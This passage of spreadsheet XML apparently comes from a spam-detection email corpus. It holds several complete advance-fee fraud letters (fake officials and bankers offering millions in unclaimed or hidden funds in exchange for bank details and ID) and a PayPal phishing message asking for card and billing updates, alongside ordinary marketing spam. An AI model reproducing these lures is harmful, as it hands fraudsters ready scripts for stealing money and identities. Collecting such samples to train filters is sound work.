    <t>Mr. Mike Obodoh &lt;mike.obodoh@caramail.com&gt;</t>
  </si>
  <si>
    <t>MY FRIEND, PLEASE I WANT TO HEAR FROM YOU TODAY</t>
  </si>
  <si>
    <t xml:space="preserve">My Dear Friend,\n \nMy name is Dr. Ben Mboye, a Uganda national. I was the Permanent Secretary of Defense &amp; Accounting Officer in Uganda. One of my reasons for contacting you is to share my joy with you that I have been exonerated and cleared by Hon Justice Julie Sebuntinde from the probe that involves three junk Chopper Helicopter purchased from Russia. My second reason is to ask you about the possibility of investing in your country that I believe we can embark upon together.\n\nDue to the strong campaign by President Yowery Museveni to subdue the rebel forces of Joseph Kony in my country, directive was given in 1997 for the need to purchase some fresh arms and ammunitions abroad, which includes 3 MI-24 Chopper Helicopter Gunship that have night vision and anti-missile devices from Russian. When my superiors in authority concluded the negotiation for the purchases, I was told to prepare a contract for the purchases of the Helicopters, which I did as the Permanent Secretary of Defence and Accounting Officer. It will amaze you to hear that after the Belarusian suppliers delivered the three MI-24 Helicopters to Uganda, inspection was carried out and it was discovered that the three MI-24 helicopters were junks. Further investigation revealed that Lt. Gen. Salim Saleh who is a younger brother to the President and his Aide-de-Camp (Mr. Ruyondo) connived with the Russian company to supply helicopter that are almost out of service (junks) and they were not overhauled for selfish financial gains.\n\nWhen Hon Justice Julie Sebuntinde probed the case, a report was released stating that The Chief of Logistics and Engineering, The Minister of State for Defence and myself have been exonerated and cleared from the offence. Please, check: ([URL]http://allafrica.com[/URL] Nevertheless, I lost my job and was prohibited from participating in public services. \n\nPLEASE NOTE: In my long years of service to my country, I was able to acquire valuable fixed assets and substantial amount of money. Why the probing of the case was going on, I was advised by my Lawyer to sell off all my acquired properties that worth million of American dollars and also to withdraw my money from my bank account to save them from being frozen and confiscated. Due to the necessity for to lie low, I delegated power to my closest aide Mr. Mike Obodoh to be in charge of my projects.    \n\nThe money realized from the sales of my properties was added to the money that was withdrawn from my account and the total amount was US$15,500,000.00 (Fifteen Million, Five Hundred Thousand United States Dollars). Since I could not lodge this fund into any bank account for fear of being traced, the money was packaged and deposited with a Security Company that belong to a Holland national, based in South Africa for safekeeping. The funds are security coded and well packaged in a sealed luggage to prevent them from knowing the content. Arrangement is going on for the money to be moved from its current location to an affiliate security company in Europe by Mr. Mike Obodoh who is currently in The Netherlands to transact this business with you since I want my identity to be kept out of the money. \n\nWhat I want from you at this moment is to indicate your interest and willingness to receive this money for investment purposes in your country. You are going to work hand-in-hand with Mr. Mugelbe Jones whom I have authorised to send this proposal to you in The Netherlands. As soon as you receive this email, you are advised to contact him on his email address: (miobod@hotmail.com.) .He will let you know the modalities to claim the funds and also give you his phone number when you contact him. You will assist me in the investment of this money, but I will not want my identity revealed. I will also want to buy properties and stocks in multi-national companies and to engage in other safe and non-speculative investments with your assistance. At this point, I want to emphasise the high level of confidentiality, which this business demands and hope you will not betray the trust and confidence that I repose on you.\n \nAs soon as I receive your response, we will discuss other modalities including remuneration for your services. You can also reach me on my email address: drben211@yahoo.co.uk  \nAs you already know, time is of great essence in this transaction, kindly confirm your telephone and fax number to Mr. Mike Obodoh. Bear in mind that this project can be concluded within five days if you are prompt in your response.\n\nKind personal regards,\nDR. BEN MBOYE.  </t>
  </si>
  <si>
    <t>3208</t>
  </si>
  <si>
    <t>To: nan\nFrom: bala kabore &lt;bala_kabore48@hotmail.fr&gt;\nDate: Tue, 17 Jul 2007 02:21:44 +0200</t>
  </si>
  <si>
    <t>Tue, 17 Jul 2007 02:21:44 +0200</t>
  </si>
  <si>
    <t>bala kabore &lt;bala_kabore48@hotmail.fr&gt;</t>
  </si>
  <si>
    <t>VERY URGENT AND EMERGENCY RESPONSE........</t>
  </si>
  <si>
    <t>Dear friend,\n\n\nI am Mr.BALA KABORE,personal assistant Branch Manager of Bank Of \nAfrica(BOA)Ouagadougou Burkina Faso,West Africa. I want to inquire from you \nif you can handle this transaction for mutual benefits/life opportunity for \nyou and me.The transaction is about seeking your consent to present you as \nthe next of kin/ beneficiary of the US$4.3 million dollars,(four \nmillion,three hundred thousand united states dollars), and who is a customer \nto the bank where i work.He died in a Kenya plane crash 2003.The Fund is \ncurrently in a suspense account awaiting claim, the bank made a public \nnotice that they are ready to release this fund to any of his relatives \nabroad.I am as convinced as believing that you will provide me, the very \nneeded urgent assistance, hence a viable bank account by which we can effect \nthe transfer of the fund.Because,due to our position as top bank officials, \nwe are not allowed to operate a foreign account, that is why i needed you to \nassist me in providing a foreign bank where this FUND will be transfered for \nimmediate disbursement according to the percentages.You can view this site \nto know more.\n[URL]http://www.eastandard.net[/URL] \narticleid=35537.THEREFORE,by virtue of its nature as being utterly \nCONFIDENTIAL, top secret should be maintained please!,because i am still in \nthe active service i do not need any form of implication especially now i'm \nin the verge of my retirement to endanger my carear at last!.\n\nSince we got the information about his death, we have been expecting his \nnext of kin to come over and claim his money because we cannot release it \nunless some body applies for it as next of kin or relation to the deceased \nas indicated in our banking guidelines and laws.In that regard, i decided to \nseek your consent for this prospective opportunity. Have it at the back of \nyour mind, that the transaction does not involve any RISK, and does not need \nmuch engagement from you, since i am familiar with this kind of transaction \nbeing an insider. Necessary modalities will be worked out to enable us carry \nout the fund claim under a legitimate arrangement. I have resolved to offer \nyou 30% of the total fund, 10% for sundry expenses that may be incurred \nduring the process of executing this transaction and 60% percent for me.I \nwill give you more details about the transaction when I receive your \naffirmative response,more clarification information. Contact me through my \nprivate e-mail address:(bala_kabore2003@yahoo.ca) .\nI'm waiting to hear from you soon.\n\nThanks and God bless.\nMr.Bala Kabore.\n\n_________________________________________________________________\nGagnez des pc Windows Vista avec Live.com [URL]http://www.image-addict.fr[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>http://www.eastandard.net http://www.image-addict.fr</t>
  </si>
  <si>
    <t>3027</t>
  </si>
  <si>
    <t>To: nan\nFrom: harrison ken &lt;harrisonken_bb@hotmail.com&gt;\nDate: Tue, 17 Apr 2007 13:40:04 +0200</t>
  </si>
  <si>
    <t>Tue, 17 Apr 2007 13:40:04 +0200</t>
  </si>
  <si>
    <t>harrison ken &lt;harrisonken_bb@hotmail.com&gt;</t>
  </si>
  <si>
    <t>AWAITING FOR YOUR URGENT RESPONSE..</t>
  </si>
  <si>
    <t>&gt;From The Office of The Director of\nInternational Relation,Access Bank Plc\n22 Marina Street,Marina\nLagos-Nigeria\n\nDear,\n\nPlease permit me to introduce my humble self to you. I am  Mr. Harrison Ken \nthe Director of International Relation with Access Bank of Nigeria Limited. \nI 'm 47yrs old and I got your email address on the Chambers of Commerce \naddress list and my confidence reposed on you to contact you. I hope you \nread this message Carefully and reply me immediately,although we have not \nmet before but I suggest that this transaction will bring us together.\n\nMy dear, we have a customer from a your country but base here in Nigeria \nsince over a decade now, his name is Mr. Hamilton Creek from Atlanta Georgia \nUnited State of America but reside here with his wife and his two children. \nMr. Hamilton Has being banking with our bank for the past 4yrs some time \nOctober 2002. On 12th of August 2003 Mr. Hamilton was on his way to his \nhouse and unfortunately he ran into a Trailer truck load of Groundnut Oil \nand died immediately. Their car got burnt and Mr. Hamilton Creek and His \nentire family was confirmed died which no single soul was saved.\n\nThe Board of Directors and the Management of Access Bank has mandated and \nInstructed me to look for Mr. Hamilton Creek relatives/his Next of Kin to \ncome and claim Mr.Hamilton's Fund. Since August 2003 till date I have been \nlooking for Mr.\n\nHamilton Creek Relatives/Next of Kin to come and claim Mr. Hamilton's Fund \nwhich he Deposited with our bank. I have made a frantic effort to contact \nthe American Embassy and after 3days the Ambassador told me that Mr. \nHamilton Creek has no relation and no next of Kin.The Ambassador also told \nme that Mr. Hamilton used his first son as His next of kin but it is quite\nunfortunate that Mr. Hamilton Creek died with all his family members. The \nreason why I contacted you is this, Mr. Hamilton is dead and his only son \nwhom supposed to inherit his properties and money also died With him.\n\nAs at this moment, nobody or person[s] is coming to claim this Money from \nour bank. The board directors and management of our  bank has told me that \nif nobody or person[s] apply for the claim of Mr. Hamilton's Fund, the bank \nwill decleared Mr.\n\nHamilton's Fund as unclaimed and it will send into the Federal Government of \nNigeria Reserve Account, In order to avert this, I want you to stand as the \nRelation/relative of Late Mr. Hamilton Creek and to act as the Hamilton's  \nrelative so that late Mr. Hamilton Creek money which he deposited with our \nbank will be release to you. It might interest you  to know that Mr. \nHamilton has a Domiciliary Bank Account with our Bank and he has a total sum \nof US$52Million (Fifty two Million\n\nUnited States Dollars) and it is the exact amount which late Mr. Hamilton \nCreek has in his domiciliary Account  and this money is still in his account \nas unclaimed money.\n\nThis transaction is very easy and simple and it is 100% risk free. I'm the \nDirector of International Relations with Access  Bank of Nigeria Limited and \nthe management/Board of Directors of the Bank are waiting for me to present \nto them the Relation or next of Kin to late Mr. Hamilton Creek, which I told \nthem that I am still searching the next of kin to the deceased.\n\nFinally, if you are interested with this transaction, I will present you to \nthe bank as the only next of kin to late Mr, Hamilton Creek and I will let \nthe bank to know that you are the only right person to inherit Late Mr. \nHamilton Funds and  properties, and his Money US$52M(fIifty two Million \nUnited States Dollars) will be transferred into Your Own  Account as late \nMr. Hamilton Creek next of kin.\n\nPlease if you are interested, Just email  me on my direct private and \nsecured Email Address for immediate commencement so that late Mr. Hamilton \nFunds will be credited Into your Account and all his Properties will be \nreleased to you either Through\n\nCourier Services or the Bank will Cargo all his properties to You in any \nwere you want it.\nSo reply me immediately and let me know what your decision and also feel \nfree to ask any questions. Meanwhile we will share Late Mr. Hamilton Creek \nFunds 50-50 which you will take 50% of the US$52M. which is amounting to \nUS$26M, (Twenty Six Million United States Dollars, while the Balance of the \nsame amount will be mine.\n\nI will be waiting for your Immediate response,\n\nThanks and have a nice day.\n\nFriendly Regards\n\nMr. Harrison Ken.\n\n_________________________________________________________________\nMessage offline contacts without any fire risk! \n[URL]http://www.communicationevolved.com[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>http://www.communicationevolved.com</t>
  </si>
  <si>
    <t>989</t>
  </si>
  <si>
    <t>To: michael_eze07@hotmail.com\nFrom: michael eze &lt;michael_eze07@hotmail.com&gt;\nDate: Tue, 16 Nov 2004 23:46:26 +0000</t>
  </si>
  <si>
    <t>Tue, 16 Nov 2004 23:46:26 +0000</t>
  </si>
  <si>
    <t>michael eze &lt;michael_eze07@hotmail.com&gt;</t>
  </si>
  <si>
    <t>michael_eze07@hotmail.com</t>
  </si>
  <si>
    <t>PRIVATE!</t>
  </si>
  <si>
    <t>ATTN:Sir/Madam,\n\nMy name is Mr Michael eze the Manager, Credit and Foreign bills of trust \nbank of africa limited.\nI am writing in respect of a foreign customer of my bank with account\nnumber 14-255-2004/utb/t whose name is Joung Heasook, Korea who perished in \na plane crash[Korean Air Flight 801] with the whole passengers aboard on \nAugust 6,1997.And for your perusal you can view thisweb site\n\n[URL]http://www.cnn.com[/URL]\n\nSince the demise of this our customer, I personally has watched with\nkeen interest to see the next of kin but all has proved abortive as no one \nhas come to claim his funds of US$25.5M (Twenty Five Million Five Hundred \nThoudsand United States Dollars) which has been with my branch for a very \nlong time.\nOn this note, I decided to seek for whom his name shall be used as the\nNext of Kin as no one has come up to be the next of kin. And the banking \nethics here does not allow such money to stay more than eight years, because \nmoney will be recalled to the bank treasury as unclaimed after this period.\nIn view of this i will give you 30% of the total. Upon the receipt of\nyour response, I will send you by fax or e-mail the application, bank's fax \nnumber and the next step to take.I will not fail to bring to your\nnotice that this business is hitch free and that you should not entertain \nany fear as all modalities for fund transfer can be finalized within five \nbanking days, after you apply to the bank as a relation to the deceased.\nWhen you receive this letter. Kindly send me an e-mail signifying your\ndecision including your private Tel/Fax numbers for quick\ncommunication.\n\nYours Sincerely,\n\nMr. Michael eze.\n\n\n\n\n</t>
  </si>
  <si>
    <t>To: jobulu1@torba.com\nFrom: James Obulu &lt;jobulu1@torba.com&gt;\nDate: Tue, 16 Mar 2004 13:04:29 +0200</t>
  </si>
  <si>
    <t>Tue, 16 Mar 2004 13:04:29 +0200</t>
  </si>
  <si>
    <t>James Obulu &lt;jobulu1@torba.com&gt;</t>
  </si>
  <si>
    <t>jobulu1@torba.com</t>
  </si>
  <si>
    <t>Hello!</t>
  </si>
  <si>
    <t>Mr James Obulu\nUnited Bank Of Africa.\nCapetown Branch,\nSouth Africa.\nEmail:jobulu@webmail.co.za\n\nI am James Obulu, Bank Manager of United Bank Of\nAfrica , capetown Branch.I have urgent and very\nconfidential business proposition for you. On June 6\n1999, a gold merchant/contractor with the Randgold\nExploration Company,Mr.Jim Smith made a numbered\ntime (Fixed) deposited for twelve calendar months,\nvalued at US$25,000,000.00 (Twenty-five Million\nDollars) in my branch.\nUpon maturity,I sent a routine notification to his\nforwarding address but got no reply.After a month,we\nsent a reminder and finally we discovered from his\ncontract employers,Randgold Exploration company Ltd\nthat Mr.Jim Smith died from an automobile accident.\nOn further investigation,I found out that he did not\nleave a WILL and all attempts to\ntrace his next of kin were fruitless.I therefore made\nfurther investigation and discovered that Mr.Jim\nSmith did not declare any next of kin in all his\nofficial documents,including his Bank Deposit\npaperwork.\nThis sum of US$25,000,000.00 is still sitting in the\nBank and the interest is being rolled over with the\nprincipal sum at the end of each year.No one will\ncome forward to claim it.According to the South\nAfrican Law, at the expiration of 5 (five) years,the\nmoney\nwill revert to the ownership of the South African\nGovernment if nobody applies to claim the funds.\nConsequently, my proposal is that I will like you as a\nforeigner to stand in as the next of kin to Mr.Jim\nSmith so that the fruits of this old man's labour will\nnot get into the hands of some corrupt officials.This\nis simple,I will like you to provide me immediately\nwith your full names and address so that the attorney\nwill prepare the necessary documents and affidavits,\nwhich will put you in place as the next of kin.I\nwould also like you to scan you drivers license for\nme.\nWe shall employ the services of two attorneys for\ndrafting and notarization of the WILL and obtain the\nnecessary documents and letter of\nprobate/administration in your favour for the\ntransfer.\nA bank account in any part of the world, which you\nprovide, will then facilitate the transfer of this\nmoney to you as the beneficiary/next of kin.The money\nwill be paid into your account for us to share in the\nratio of 60% for me and 40% for you.There is no risk\nat all as all the paperwork for this transaction will\nbe done by the attorney and my position as the Branch\nManager guarantees the successful execution of this\ntransaction.\nIf you are interested,please reply immediately.Upon\nyour response,I shall then provide you with more\ndetails and relevant documents that will help you\nunderstand. Please\nobserve utmost confidentiality,and rest assured that\nthis transaction would be most profitable for both of\nus because I shall require your assistance to invest\nmy share in your country.\nAwaiting your urgent reply via email.\nThanks and regards,\n\nJames Obulu.\n\n\n\n\n\n ---\n[URL]http://www.torba.com[/URL]\n\n</t>
  </si>
  <si>
    <t>http://www.torba.com</t>
  </si>
  <si>
    <t>5184</t>
  </si>
  <si>
    <t>To: gibbs@midrange.com\nFrom: Consumer Today &lt;reply_3@ct2.consumertoday.net&gt;\nDate: Tue, 16 Jul 2002 19:09:47 -0400 (EDT)</t>
  </si>
  <si>
    <t>Tue, 16 Jul 2002 19:09:47 -0400 (EDT)</t>
  </si>
  <si>
    <t>Complimentary Thermal Coffeemaker from Gevalia!</t>
  </si>
  <si>
    <t>------000000000000000000000000000000000000000000000000000000000000000\nContent-Type: text/plain; charset="us-ascii"\nContent-Transfer-Encoding: 7bit\n\nGood news!  As someone who is interested in receiving offers, \nyou'll now begin to receive exclusive deals from Consumer Today.  \nIf you have any questions or would like not to receive our great \noffers, please follow our easy unsubscribe process below.  Welcome \nand we look forward to serving you!\n**************************************************************\n\n\nTaste two 1/2-lb. varieties of Gevalia Kaffe and we'll \nsend you an 8-cup Thermal Coffeemaker as your FREE GIFT.\n[URL]http://ct2.consumertoday.net[/URL]\n\n\nAll of this can be yours for only $14.95\n\n * Two 1/2-lb. Packages of Gevalia Coffee \n * Our 8-cup Thermal Coffeemaker FREE\n * Gevalia Gift Catalog\n\nTotal Retail Value of This Special Offer $80\n\n\nA special offer for the discriminating coffee drinker.\n[URL]http://ct2.consumertoday.net[/URL]\n\nIndulge your passion for coffee. Select two 1/2-lb. \npackages of smooth, aromatic Gevalia Kaffe for only \n$14.95, including shipping and handling, and we'll \ndeliver them to your door with an 8-cup Thermal \nCoffeemaker (retail value of $80) as a FREE GIFT. \nWith this machine, coffee is brewed directly into \nits own thermal carafe and stays hot and flavorful \nfor hours.</t>
  </si>
  <si>
    <t>http://ct2.consumertoday.net http://ct2.consumertoday.net</t>
  </si>
  <si>
    <t>5183</t>
  </si>
  <si>
    <t>To: &lt;yyyy@spamassassin.taint.org&gt;\nFrom: "IQ - NBC" &lt;nbc@insurancemail.net&gt;\nDate: Tue, 16 Jul 2002 19:04:20 -0400</t>
  </si>
  <si>
    <t>Tue, 16 Jul 2002 19:04:20 -0400</t>
  </si>
  <si>
    <t>"IQ - NBC" &lt;nbc@insurancemail.net&gt;</t>
  </si>
  <si>
    <t>Pru Life's UL Portfolio Rocks</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format. ------=_NextPart_000_266701_01C22CE6.6C78C6F0 Content-Type: text/plain; 	charset="Windows-1252" Content-Transfer-Encoding: 7bit  PruLife Universal Protector  - and -  Prulife Universal Plus   ROCK!    Case Closed! Permanent Life Insurance at Affordable Rates Whether your clients are looking to pay the Minimum Premiums needed to Endow* a policy at a specific age or pay sufficient premiums needed to guarantee** a death benefit for life, Prudential has the answer. PruLife Universal ProtectorSM offers competitive lifetime death benefit guarantee premiums. PruLife Universal PlusSM offers competitive minimum premiums to endow and competitive long term cash value accumulation. And that's not all. Look what else Prudential+ has to offer...   _____   COMPETITIVE COMPENSATION	   	 Rolling Commissionable Target Premiums (R-CTP)++. First year compensation will be paid until the R-CTP is reached during the first 24 policy months. 	  	 First year commissions that do not reduce at any issue age. 	  COMPETITIVE UNDERWRITING	   	 Issue ages 0-90	   	 Continuation of coverage beyond age 100 (policy has no maturity age).	   	 Preferred Non-Smoker category for cigar smokers, pipe smokers and smokeless tobacco users (nicotine patch and gum users also may be eligible if they have not smoked cigarettes in the last 12 months) 	  	 Preferred Plus Smoker category for healthy Cigarette Smokers.  	 Aviation: Preferred rates may be offered to commercial pilots and most student and private pilots who fly up to 200 hours per year, regardless of whether helicopters or fixed wing aircraft are flown. 	  	 Treadmills not required for preferred rates for face amounts within our capacity limits	   	 Improved Ratings for Prostate Cancer, Hepatitis B &amp; C	   	 Heart attack? Consider Prudential as soon as the prospect returns to normal activities	   	 Liberal Build Tables to qualify for Preferred rates	  INCREASED CAPACITY	   	 $70 million capacity without the need to discuss a risk with reinsurers.	   	 Facultative reinsurance may be available for cases in excess of $70 million.	    _____   Click our logo for the BGA nearest you! Click here for the NBC BGA Locator!   ? or ? Please fill out the form below for more information	  Name:	  	 	 E-mail:	  	 Phone:	  	 City:	  	State:	  	  	  	 	   	    National Brokerage Consortium * Minimum Premium to Endow is a hypothetical, non-guaranteed premium that, based on current charges and the current interest rate, would keep the policy in force to age 100. Interest rates and charges will change over time, as will the Minimum Premium to Endow. These premiums are shown as hypothetical figures based on the stated assumptions and are shown for comparative purposes only. The actual premium needed to keep the policy in force is based on actual results and may be higher or lower. ** All guarantees are based on the claims-paying ability of the issuer.  + PruLife Universal Protector is issued by Pruco Life Insurance Company. PruLife Universal Plus also is issued by Pruco Life Insurance Company in all states except New Jersey and New York, where it is issued by Pruco Life Insurance Company of New Jersey, both Prudential Financial, Inc. companies located at 213 Washington Street, Newark, NJ 07102-2992. Each is solely responsible for its own financial condition and contractual obligations.  ++ Available on contracts dated Jan. 1, 2002 &amp; later. Not available in New York &amp; New Jersey. Prudential Financial is a service mark of The Prudential Insurance Company of America, Newark, NJ and its affiliates. For financial professional use only. Not for use with the public.  IFS-A072238 Ed. 7/2002 Exp. 12/2003	  We don't want anyone to receive our mailings who does not wish to. This is professional communication sent to insurance professionals. To be removed from this mailing list, DO NOT REPLY to this message. Instead, go here: [URL]http://www.Insurancemail.net[/URL]   Legal Notice    ------=_NextPart_000_266701_01C22CE6.6C78C6F0 Content-Type: text/html; 	charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Pru Life's UL Portfolio Rocks =20 =20              =20        =20           =20              Case = Closed!               Permanent Life Insurance at Affordable = Rates Whether your clients are looking to pay the Minimum=20               Premiums needed to Endow* a policy at a specific age or = pay sufficient=20               premiums needed to guarantee** a death benefit for               life, Prudential has the answer. PruLife Universal ProtectorSM offers=20               competitive lifetime death benefit guarantee premiums. = PruLife Universal=20               PlusSM offers competitive minimum premiums to = endow and=20               competitive long term cash value accumulation. And that's not all. = Look what=20               else Prudential+ has to offer... =20           =20              =20                 COMPETITIVE COMPENSATION =20                   Rolling Commissionable Target = Premiums (R-CTP)++.                   First year compensation will be paid until the R-CTP = is reached=20                   during the first 24 policy months. =20                    First year commissions=20                   that do not reduce at any issue age. =20                  COMPETITIVE UNDERWRITING =20                   Issue ages = 0-90 =20                   Continuation of = coverage=20                   beyond age 100 (policy has no maturity = age). =20                   Preferred Non-Smoker category                   for cigar smokers, pipe smokers and smokeless tobacco = users=20                   (nicotine patch and gum users also may be eligible if = they have=20                   not smoked cigarettes in the last 12 months)  =20                   Preferred Plus = Smoker category=20                   for healthy Cigarette Smokers. =20                   Aviation: Preferred rates=20                   may be offered to commercial pilots and most student = and private=20                   pilots who fly up to 200 hours per year, regardless of = whether=20                   helicopters or fixed wing aircraft are flown. =20                   Treadmills not = required=20                   for preferred rates for face amounts within our = capacity limits =20                   Improved = Ratings for Prostate=20                   Cancer, Hepatitis B &amp; C =20                    Heart attack? = Consider=20                   Prudential as soon as the prospect returns to normal = activities =20                   Liberal Build = Tables to=20                   qualify for Preferred rates =20                 INCREASED = CAPACITY =20                   $70 million = capacity without=20                   the need to discuss a risk with = reinsurers. =20                   Facultative = reinsurance=20                   may be available for cases in excess of $70 = million. =20            Click our logo for the BGA nearest = you!             — or — =20                  =20                      =20                         Please fill = out the form below for more information =20                         Name: =20                            =20                         E-mail: =20                            =20                         Phone: =20                            =20                         City: =20                            State: =20                            =20                           =20                              =20                            =20            =20           * Minimum Premium to Endow is a = hypothetical, non-guaranteed=20             premium that, based on current charges and the current = interest rate,=20             would keep the policy in force to age 100. Interest rates = and charges=20             will change over time, as will the Minimum Premium to Endow. = These=20             premiums are shown as hypothetical figures based on the = stated assumptions=20             and are shown for comparative purposes only. The actual = premium needed=20             to keep the policy in force is based on actual results and = may be=20             higher or lower. ** All guarantees are based on the = claims-paying=20             ability of the issuer.              + PruLife Universal Protector is issued by Pruco Life = Insurance Company.=20             PruLife Universal Plus also is issued by Pruco Life = Insurance Company=20             in all states except New Jersey and New York, where it is = issued by=20             Pruco Life Insurance Company of New Jersey, both Prudential = Financial,=20             Inc. companies located at 213 Washington Street, Newark, NJ = 07102-2992.=20             Each is solely responsible for its own financial condition = and contractual=20             obligations.              ++ Available on contracts dated Jan. 1, 2002 &amp; later. = Not available=20             in New York &amp; New Jersey.             Prudential Financial is a service mark of The Prudential = Insurance=20             Company of America, Newark, NJ and its affiliates. For = financial professional=20             use only. Not for use with the public.              IFS-A072238 Ed. 7/2002 Exp. 12/2003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266701_01C22CE6.6C78C6F0--</t>
  </si>
  <si>
    <t>5181</t>
  </si>
  <si>
    <t>To: &lt;yyyy@spamassassin.taint.org&gt;\nFrom: BidsToGo &lt;webmaster@bidstogo.biz&gt;\nDate: Tue, 16 Jul 2002 14:25:27 -0400</t>
  </si>
  <si>
    <t>Tue, 16 Jul 2002 14:25:27 -0400</t>
  </si>
  <si>
    <t>BidsToGo &lt;webmaster@bidstogo.biz&gt;</t>
  </si>
  <si>
    <t>"BidsToGo" is places to go, things to do</t>
  </si>
  <si>
    <t xml:space="preserve">  \n  \n\n\nHello,  |\n\n_Privacy policy_ : To permanently opt out of our mailings simply send a blank\nemail to optout@bidstogo.biz.\n\n|  \n---|---|---  \n  \nBidsToGo invites you visit and explore  [URL]http://www.bidstogo.biz[/URL], the site\ndedicated to  _places to go_ and  _things to do_. You can use BidsToGo to\nadvertise, sell or auction places to go and things to do - and right now it is\nFREE to make a basic listing.\n\nBidsToGo is great for  \n  **Lodging**\n\nHotels, bed &amp; breakfasts, resorts, timeshares, vacation rentals, etc.\n\n| **Travel**\n\nCruises, yacht charters, rail tours, auto rental, etc.  \n  \n---|---  \n**Vacation packs**\n\nSkiing, outfitters, hunting, fishing, golf, abroad, resorts, etc.\n\n| **Game tickets** **  \n**Football, baseball, basketball, hockey, etc.  \n**Events and Festivals**\n\nFestivals, events, tournaments, races, bowl games, parades, etc.\n\n| **Theme parks**\n\nDisney World, Busch Gardens, Kings Dominion, Sea World, etc.  \n  \n**Concerts**\n\nMusical concerts\n\n| **Theater**\n\nPlays, operas, musicals, etc.  \n  \n**Training**\n\nProfessional or personal training\n\n|  \n  \nVisit [URL]http://www.bidstogo.biz[/URL]\n\n* * *\n\n\n\n_Privacy policy_ : To permanently opt out of our mailings simply send a blank\nemail to optout@bidstogo.biz. Contact CustomerService for more information.\n\n</t>
  </si>
  <si>
    <t>http://www.bidstogo.biz http://www.bidstogo.biz</t>
  </si>
  <si>
    <t>To: jose@monkey.org\nFrom: Customer Support - PayPal &lt;noreply@support.org&gt;\nDate: Tue, 16 Aug 2016 02:04:24 +0200 (CEST)</t>
  </si>
  <si>
    <t>Tue, 16 Aug 2016 02:04:24 +0200 (CEST)</t>
  </si>
  <si>
    <t>Customer Support - PayPal &lt;noreply@support.org&gt;</t>
  </si>
  <si>
    <t>=?UTF-8?Q?=E2=9C=89_?= Please log in to your account to see the steps that apply to you =?utf-8?Q?=E2=9C=94?=</t>
  </si>
  <si>
    <t>Confirm your email Confirm your email  Dear Customer, Hello PayPal Customer,  We are sorry to inform you that you can not access all your paypal advantages like sending money and purchasing,due to account limitation .  Login Now "Why my account PayPal™ is limited?" Because we think that your account is in danger from stealing and unauthorized uses .  What can I do to resolve the problem?  - Log in to your PayPal account.      - Update your account informations ( card - billing ) Sincerely, PayPal Help Center [URL]https://www.paypal.com[/URL] |  Resolution Center [URL]https://www.paypal.com[/URL] |  Security Center [URL]https://www.paypal.com[/URL]  Please do not reply to this email. To get in touch, go to the PayPal website and click "Help". Copyright © 1999 – 2016 PayPal. All rights reserved. Consumer advisory - PayPal Pte. Ltd. the holder of PayPal's stored value facility, does not require the approval of the Monetary Authority of Singapore. Users are advised to read the terms and conditions carefully. PayPal PPC000251:5b93711e6b9f0 Dear Customer, We are sorry to inform you that you can not access all your paypal advantages like sending money and purchasing,due to account limitation .  Login Now Why my account PayPal is limited? Because we think that your account is in danger from stealing and unauthorized uses .  What can I do to resolve the problem?  Log in to your PayPal account.      Update your account details ( adress - card )  If you have questions about your account, please log in and click Contact Us. Sincerely, PayPal Help Center |  Resolution Center | Security Center  Please do not reply to this email. To get in touch, go to the PayPal website and click Help.</t>
  </si>
  <si>
    <t>https://www.paypal.com https://www.paypal.com https://www.paypal.com</t>
  </si>
  <si>
    <t>1445</t>
  </si>
  <si>
    <t>To: nan\nFrom: uzor &lt;uzor5@myway.com&gt;\nDate: Tue, 16 Aug 2005 15:41:22 +0200</t>
  </si>
  <si>
    <t>Tue, 16 Aug 2005 15:41:22 +0200</t>
  </si>
  <si>
    <t>uzor &lt;uzor5@myway.com&gt;</t>
  </si>
  <si>
    <t>PLEASE GET BACK TO ME</t>
  </si>
  <si>
    <t>\nFrom:DR.UZOR OBI.\nE-mail:uzor5@myway.com\nTel:234-8042137980\nDate 16/08/2005\nDear Sir,\nWe are making this contact with you because of the reliable information available to us concerning your reputation and that of your company. This \nbusiness request may seem strange, but I crave your indulgence and pray you, view it seriously as we re convinced that you would be capable to provide us \nwith a solution to a moneytransfer of Thirty Two Million, Five hundred thousand United State Dollars (US$32,500,000.00) First of all I am an \naccountant and Auditor of the Petroleum (special) Trust Fund (N.N.P.C) the \nApex Department of the Oil Industry in Nigeria.\n \nI am also a member of its Foreign Contract Tenders Committee (FCTC). My principal job/function has to do with the Appraisal and Approval of payment of contract awarded by this parastatal. In the course of my duties, I discovered various over inflated contract values totaling US$32.5Million. The said amount emanated from deliberate over invoicing of old projects executed by some foreign firms through some government officials.These officials have since been moved or retired following the inauguration of the new administration. After due consultation with key members of the Tenders Committee (FCTC), I was mandated to seek and arrange with a trusted foreign National who can assist us in transferring the above state amount out of Nigeria.Now that all the contracts have been paid following the completion and commissioning of the various contract, the above mentioned sum through approved is still floating. We decided to transfer this money to a safe and trusted bank accounts with a\n  very reliable person to assist us after which the funds be share in the understated ratio.Your assistance is needed for two main reasons;\n (i) As government employees ,we are not permitted by the Nigeria law to operateforeignaccounts. (ii)Since the initial contracts were executed by the \nforeign firms, only a foreign firm can make claims or as a beneficiary for the purpose of transferring the money out of Nigeria.We have unanimously agreed to compensate you with 35% of the total sum ( US$32.5Million ) if you are willing to render us your assistance as regards the transfer. It was also agreed that 5% shall be set aside to offset incidental expenses that might be incurred by either of us course of offsetting this transfer. The remaining 60% shall be our due share.All necessary arrangements required for a speedy conclusion of this transaction have been put in place with top officials of the Nigeria Federal Ministry of Finance and the Central Bank of Nigeria to enable us conclude the \nwhole transaction within a very shortspace of time.What is required of you is \nfirst to furnish us with the following through my email address.\n1.) Bank details to be used (that is banks name and account number )\n2.) The beneficiary's name,\n3.)Your private / official telephone and fax number.While promising you a \nsmooth and hitch -free transfer of this fund into the account nominated by you, we want you to know that this is very sensitive transaction which should not be disclosed to any other party. This is very important because this deals involves some high ranking Nigeria \nGovernment Officials who would not want to be involved in any form of scandal.We however trust that this will be the beginning of a lasting business relationship between you and us as we shall appreciate your advice on the investment opportunities in your line of business or any other type of viable business in your country.If this deal interest you,reply me \nimmediately through my personal E-mail: uzor5@myway.com or call me on my \nreceiving number:234-8042137980 for more details.\nBest regards as we look forward to hearing from you soonest.\nYour Sincerely,\nDR UZOMA OBI.\n\n\n___________________________________________________________________________\n----------------------------------------------\n[URL]http://www.zahnklinik-innsbruck.at[/URL]\n\n\n</t>
  </si>
  <si>
    <t>http://www.zahnklinik-innsbruck.at</t>
  </si>
  <si>
    <t>1010</t>
  </si>
  <si>
